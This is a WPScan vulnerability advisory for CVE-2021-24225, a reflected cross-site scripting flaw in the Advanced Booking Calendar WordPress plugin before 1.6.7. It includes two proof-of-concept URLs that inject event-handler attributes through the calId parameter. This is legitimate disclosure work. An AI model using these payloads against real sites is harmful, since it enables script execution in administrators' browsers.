WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Advanced Booking Calendar < 1.6.7 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin did not sanitise the calId GET parameter in the "Seasons & Calendars" page before outputing it in an A tag, leading to a reflected XSS issue

Proof of Concept

Payloads:
- Original reporter: /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=calNotDeleted&calId=aaaaaaaa%22+onclick%3Dalert%28123%29%3B%2F%2F

- WPScanTeam: /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=calNotDeleted&calId=a%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29+b%3D%22

Affects Plugins

advanced-booking-calendar
Fixed in version 1.6.7

References

CVE
CVE-2021-24225
URL
https://plugins.trac.wordpress.org/changeset/2503971/

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

iohex

Submitter

iohex

Submitter twitter
iohehe
Verified

Yes

WPVDB ID
25ca8af5-ab48-4e6d-b2ef-fc291742f1d5

Timeline

Publicly Published

2021-03-28 (about 2 years ago)

Added

2021-03-28 (about 2 years ago)

Last Updated

2021-03-30 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin